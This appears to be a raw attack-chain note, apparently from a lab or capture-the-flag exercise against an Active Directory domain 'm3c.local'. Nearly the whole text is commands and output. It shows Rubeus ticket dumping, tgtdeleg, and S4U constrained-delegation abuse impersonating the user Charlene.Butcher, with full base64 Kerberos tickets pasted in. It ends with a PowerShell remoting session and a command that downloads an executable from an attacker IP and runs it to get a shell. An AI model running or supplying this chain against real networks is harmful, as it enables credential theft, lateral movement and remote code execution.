rubeus triage
rubeus dump /service:krbtgt /nowrap
rubeus tgtdeleg /nowrap
This will perform an S4U2Self first and then an S4U2Proxy.
rubeus -i s4u /ticket:doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA60+EcctswlWfoVke6pt3PNw4qZV2sUZorvRrWmTDrG7KdcAwGEX+TUXON/MwMe5QwaXFv/F3R9VzTQ95h+3ORRs2uqEn8Kh/qq0JNUxjCI2wpI9dtqIcHhjfXOmWEHzta/9U97/H+AJLjnMxuD2iQ7hjGSkUKIrJ7hcEYNmcIiqrtxP6gIUTiy4taGq7kTFpje27D6cHCu5NlIf4AvfDr+OvWo8nVlmuXFRKP7uJCNXWPno3HM0M5eYdW1xuav6iDkMSg/wxWNMlvE5nEqhD6wAB5wifEJ5o/Xq2HpCHiG014ngEdq+XDpyhNR5XIaE5KoPRDkANDf85GUQ0sP0Kcf5nHVNj21WzyIWYZ2IWQgd2SRt7uYPS+zHbCthzTEfZstR9qj/BGdRqdAVqshFRJKOpFP8ed5aLPdWwL2RvTCyVpCRvOIUTqquFJjFzYMgp0Lj/hmR0Gok8hDPzuRaJeN1pqmbhIgzldFPfOa+lGC8nkHLGvkUaVJWkp67/k1SJDXjPGPEtgUvIssh9iuI1zGogjWk4yapA0HY7GZF48wzLn/BwIIvDdhDIC2bkUsafECMFezBwGczo0UC6My6TrZEWS5jSSlgeYWCofwDXGe1wXVGW6wSCqIMkX2aM7O0SiwPAj31A9FR+aPuUyuhN31q30icRVJRENgFL6aUJ52c6uD+ksj/njdbaZYpz9E3MLkI7TYzWgcW/DPtdMr5k9CrrE8YDpMQN4YdKzwoFR/jj9RuLCgJnfafL2U1z/B38qDxkt3MbTLONfVRUzuPA2VnWLo3aZsTA3Glc39MVpP3Ru7ZhvBnUyPEW0sxs7ALWnEGjiLzb4wQlj9bMh0qjJinKJEfEpIEyGd+apV1Xs4v2Ey/Ps2g+cTOuwaI5CEBMinT0YOKpugbeQ+ZHYLLOR9LrgObDmef77gA5sN+Y8jEQwnjlBNpRD4qLp3VR6FyX7mMalN3a7M3obMOLj27o9OIpEv8YNerjNTmxQW4ncZKcX6MqnkxeZaL5dNDb7TkRYMIrtunSZAg5+IUhEkiGViwWCAsctuOf8wuz6glRSFkhbWhh9D3Xa5ErtlXe+HsLBBDsY7qZBChcFm1Cf3QifOBHpPkg4jWaLMOAbzV+CgMlwv4pN2eHzXKz8YUmtFcW12jdBEXahT6O3XMsuH9ZpBD/gjCxcDTVSZYVR2NXTVtaAhwbBRs02UPF8jfZRHLDEhv23c764oFjSOAGsgFnbQ1ttvwL6W5+Zzu4cRupaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIEum9vaCZxPkPqP47kE0+AxnReRWY8kj/7CMZmfyEEa5oQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAGChAAClERgPMjAyNDAyMTAxNzE5MjRaphEYDzIwMjQwMjExMDAwMDAwWqcRGA8yMDI0MDIxNzE0MDAwMFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /impersonateuser:Charlene.Butcher /msdsspn:time/m3webaw.m3c.LOCAL /altservice:http /dc:m3dc.m3c.local /ptt /nowarp
[*] base64(ticket.kirbi) for SPN ‘http/m3webaw.m3c.LOCAL’:
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
Enter-PSSession -ComputerName m3webaw.m3c.local
Getting a shell
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.207:443/CASUAL_PLATFORM.exe', 'C:\Users\Charlene.Butcher\Documents\CASUAL_PLATFORM.exe')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ./CASUAL_PLATFORM.exe